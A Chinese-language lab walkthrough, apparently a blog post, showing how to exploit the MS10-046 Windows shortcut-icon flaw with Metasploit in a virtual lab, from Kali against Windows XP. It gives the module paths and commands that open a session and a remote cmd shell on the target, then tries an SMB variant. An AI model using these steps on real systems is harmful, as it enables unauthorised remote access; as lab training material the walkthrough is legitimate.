本實驗在虛擬機器環境下進行！！！

準備：

Kali 192.168.88.105

Xp  192.168.88.106 

這個是一個圖示漏洞，所以我們只需要設定好引數，等待靶機訪問即可

進入msfconsole

search  ms10_046 查詢相應的模組

這裡可以看到，有兩個可用於攻擊的模組，但一個是browser一個是smb，我們先試試browser的行不行

使用模組

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

檢視可以滲透的目標

show targets

看到是Automatic,說明都可以

檢視選項引數

show options

可以看到，預設已經把引數設定好了，我們只管run即可

run執行

可以看到，他說傳送了客戶端在\\192.168.88.105\LNivjPN\這個地址上

我們用xp來訪問一下

就兩個看起來與世無爭的小東西

但我們的kali湧出了大量資訊

那麼大一段字不重要，重要的是箭頭所指處，session會話已經建立

我們sessions來看看現在建立了那些會話

可以看到，sessions列表中已經有了我們的xp了

我們用sessions -i 1來連線xp

可以看到，已經連線成功了

 我們使用shell來獲取xp的shell

看到命令提示符已經變成了window下的cmd了，說明滲透成功

再試試另一個模組可不可以

use exploit/windows/smb/ms10_046_shortcut_icon_dllloader

run 執行

可以看到，它說要去訪問\\192.168.88.105\WUMiC\EbWWhz.dll這個路徑

我們進入xp，進行訪問

開啟方式選記事本，可以看到，kali那裡返回了資訊

他說那個lnk檔案也必須被髮送

這個兩個檔案分開的，不太好弄，不如上一個模組。所以我們ctrl+c停止執行，不使用這個模組了。。。